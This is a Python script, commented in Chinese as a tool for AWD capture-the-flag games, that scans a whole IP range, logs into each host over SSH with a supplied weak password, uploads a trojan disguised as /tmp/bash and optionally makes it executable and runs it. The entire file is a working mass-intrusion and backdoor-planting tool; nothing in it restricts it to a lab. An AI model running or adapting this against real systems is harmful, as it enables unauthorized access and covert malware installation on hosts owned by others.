# 本程序用于awd中弱口令账户批量上传后门
# 用的是
# 默认将程序上传至/tmp/bash以达到伪装的目的
# 通过exec参数可以设置上传后隐蔽执行

import paramiko 
from scp import SCPClient
import argparse
import re
import ipaddress
import os


def Upload_Trojans(host, port, source_path, username, password, dest_path="/tmp/bash"):
    ssh_client = paramiko.SSHClient()
    ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy)
    ssh_client.connect(host, port, username, password)
    scpclient = SCPClient(ssh_client.get_transport(), socket_timeout=15.0)
    try:
        scpclient.put(source_path, dest_path)
    except FileNotFoundError as e:
        print(e)
        print("Can't find the file")
        ssh_client.close()
        return 0
    else:
        print(host + " upload success")
        ssh_client.close()
        return 1


def Get_Target(target):
    try:
        ipaddress.ip_network(target, False)
    except Exception as e:
        exit("The correct IP is required")

    network = ipaddress.ip_network(target, False)
    target_list = list(network)
    for i in range(len(target_list)):
        target_list[i] = str(target_list[i])
    return target_list


def Get_Trojan(trojan):
    if os.path.isfile(trojan):
        return os.path.abspath(trojan)
    else:
        exit("Can't find the file")

def Exec_Backdoor(host,port,username,password):
    ssh_client = paramiko.SSHClient()
    ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy)
    ssh_client.connect(host, port, username, password)
    try:
        cmd ="chmod +x /tmp/bash&&/tmp/bash"
        ssh_client.exec_command(cmd)
    except CommandError as e:
        print(e)
        print("Can't execute the command")
        ssh_client.close()
        return 0
    else:
        print(host + " execute success")
        ssh_client.close()
        return 1

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--target', required=True, help='ip address')
    parser.add_argument('--trojan', required=True, help='trojan path')
    parser.add_argument('--username', required=True, help='target username')
    parser.add_argument('--password', required=True, help='target password')
    parser.add_argument('--destpath', default="/tmp/bash",
                        help='destination path, default is /tmp/bash')
    parser.add_argument('--port', default="22",
                        help="destination port, default is 22")
    parser.add_argument('--exec', action='store_true',help="execute the trojan")
    args = parser.parse_args()
    
    target_list = Get_Target(args.target)
    trojan = Get_Trojan(args.trojan)
    username = args.username
    password = args.password
    dest_path = args.destpath
    port = args.port
    
    if args.exec:
        for host in target_list:
            Upload_Trojans(host, port, trojan, username, password, dest_path)
            Exec_Backdoor(host, port, username, password)
    else:
        for host in target_list:
            Upload_Trojans(host, port, trojan, username, password, dest_path)